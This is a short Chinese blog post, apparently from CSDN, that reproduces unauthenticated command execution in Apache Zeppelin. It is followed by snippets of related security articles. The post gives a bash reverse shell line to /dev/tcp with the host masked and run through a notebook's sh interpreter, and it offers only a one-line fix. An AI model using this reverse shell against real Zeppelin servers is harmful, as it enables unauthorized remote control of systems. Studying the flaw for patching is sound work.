Zeppelin未授权访问getshell

最新推荐文章于 2024-06-06 17:43:22 发布
最新推荐文章于 2024-06-06 17:43:22 发布
阅读量824 收藏
点赞数
分类专栏: 渗透测试 漏洞复现 文章标签: Zeppelin Zeppelin未授权 getshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/115029325
版权

0x00 前言

Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。

Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等。

0x01 漏洞复现

主要是未授权带来了命令执行漏洞,直接干货来操作:

1、Create New Note:

执行Linux反弹,使用sh。

2、执行反弹命令

bash -i &>/dev/tcp/xxxxxxx/xxxxx <&1

3、或者直接进行执行命令:

0x02 修复建议

禁止未授权匿名帐户访问

转载请注明:Adminxe's Blog » Zeppelin未授权访问getshell

Adminxe
关注
专栏目录
Apache Zeppelin 命令执行漏洞复现(CVE-2024-31861)
0xSec
04-15 1698
Apache Zeppelin 中代码生成控制不当(“代码注入”)漏洞。攻击者可以使用 Shell解释器作为代码生成网关,系统org.apache.zeppelin.shell.ShellInterpreter类直接调用/sh来执行命令,没有进行过滤,导致RCE漏洞。
Apache Zeppelin 授权任意命令执行.md
04-12
Apache Zeppelin 授权任意命令执行
zeppelin 授权任意命令执行漏洞复现
最新发布
YJ_12340的博客
06-06 956
查看 /etc/passwd,主要注意root和abc两个用户,其中root用户中间的两个数字为 0:0,第一个0(UID)代表root用户,第二个0(GID)代表root组,abc用户的为 1000:1000,同样的,分别代表abc用户和abc组。我们使用sh弹回来的shell进行下一步操作,创建一个特权用户,拿下对目标的持续控制,因为弹回来的是root权限,所以我们可以很方便的操作,但如果是普通用户,我们可以尝试是否拥有sudo权限,如果没有那就得另觅它法了。,如图所示,开启了监听。
python 入侵服务器_【漏洞预警】Zeppelin安装配置不当可导致服务器被入侵
weixin_39867509的博客
12-16 264
本帖最后由 唯品会SRC 于 2017-8-3 16:07 编辑Zeppelin安装配置不当可导致服务器被入侵关于Zeppelin问题出在哪Zeppelin后台执行操作系统命令其他总结关于Zeppelin“Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的开源框架。Zeppelin提供了数据分析、数据可视化等功能。Zeppelin 是一个提供交互数据分析且基于Web的笔记本。...
azkaban与zeppelinshell脚本调度任务
qq_40537039的博客
11-19 1246
Shell脚本 编写Shell脚本实现Azkaban利用用户名、密码、noteID等来调用Zeppelin的代码。 #!/bin/bash #设置参数默认值 zeppelin_server_addr=192.168.128.200 port=8089 # 登录到zeppelin服务器,并且保存本次会话的cookie信息 curl -X ...
zeppelin&说明书.rar
09-17
5. **防火墙设置**:如果系统有防火墙,记得开放Zeppelin默认的端口(通常是8080)以允许外部访问。 **三、使用Zeppelin** 1. **访问Web界面**:启动成功后,通过浏览器访问`http://your_server_ip:8080`,输入默认...
zeppelin-authentication:Zeppelin的简单身份验证
05-21
Docker的Zeppelin身份验证 是的笔记本。 Zeppelin不支持身份验证,这是多用户环境的要求。 这是尝试使用nginx和Docker容器提供简单的基于密码的身份验证。 创建密码文件 需要基本的密码文件进行身份验证。 我不随...
Zeppelin源码分析—Zeppelin的设计思想
01-27
支持多种语言,包括Scala、Python、SparkSQL、Hive、Markdown、Shell等。本文从需求出发,探索Zeppelin的架构设计、技术选型、代码的模块划分和依赖关系的最初“出发点”,从而我们可以了解到Zeppelin为什么是这样...
Apache Zookeeper 授权访问漏洞【原理扫描】
萌兔兔MMQ!!
11-25 1万+
漏洞名称 Apache Zookeeper 授权访问漏洞【原理扫描】风险等级 高高可利用 否CVE编号 -端口(服务) 2181(zookeeper)风险描述 ZooKeeper是一个高性能的分布式数据一致性解决方案,它将复杂的,容易出错的分布式一致性服务封装起来,构成一个高效可靠的原语集,并提供一系列简单易用的接口给客户使用。ZooKeeper默认开启在2181端口,在进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
zeppelin-0.8.1-bin-all.tgz
07-10
zeppelin-0.8.1-bin-all.tgz
运维安全·Web组件安全·Redis/ES/Zookeeper/Docker
不忘初心,护天下安全!
07-30 1257
一、Redis授权访问 二、zookeeper授权访问 zookeeper的指令集:https://blog.csdn.net/dandandeshangni/article/details/80558383 三、docker授权访问 四、ElasticSearch、kibana授权访问 五、Yarn授权访问 poc: import requests target = 'http://10.1.5.168:8088/' url = target + 'ws/v
启动kibana后关闭shell窗口后kibana自动关闭
alex的博客
04-12 1万+
启动kibana后关闭shell窗口后kibana自动关闭的解决办法
敏感信息泄露总结
goddemon
03-15 1万+
一.源代码泄露 二.服务器导致的泄露 Apache类泄露 样例文件泄露 /examples/servlets/servlet/CookieExample /examples/servlets/servlet/RequestHeadersExample /examples/jsp/snp/snoop.jsp /examples/async/async1 cookie泄露 IIS泄露 典型iis短文件名 https://github.com/lijiejie/IIS_shortname_Scanner To
Kibana 任意代码执行漏洞
neal1991的专栏
10-18 5055
点击蓝字“madMen”关注我哟这几天,有人公开了 Kibana 任意代码执行漏洞(CVE-2019-7609)的 POC。这个漏洞的主要原理是因为 Kibana ...
zeppelin权限问题
anzhuangguai的专栏
04-21 2087
OS: hdp2.5 现象:重起后齐柏林不工作 查看日志是因为没/var/run权限 修改方法 mkdir -p /var/run/zeppelin chown zeppelin:zeppelin /var/run/zeppelin https://community.hortonworks.com/questions/44451/zeppelin-s
Kibana授权访问漏洞复现、CVE-2019-7609 Kibana远程代码执行漏洞复现
热门推荐
weixin_43061533的博客
12-25 1万+
0x01 漏洞简述 Kibana如果允许外网访问,没有做安全的登录认证,也会被外部随意访问查看所有的数据,造成少数据泄露。在默认配置下,Kibana就可以访问Elasticsearch中的所有数据。 0x02 知识扩展 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是各种不同的图表、表格、地图等,直观的展示数据,从而达到高级的数据分析
Cloudera Manager中快速安装Zeppelin的指南
由于默认的CDH6.2.1 parcel包包含Zeppelin,作者通过自己的安装经历,分享了一个简便的方法,以帮助其他需要安装Zeppelin的用户。" 本文档首先提到了在安装Zeppelin之前,需要配置Java和Maven的环境变量。对于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值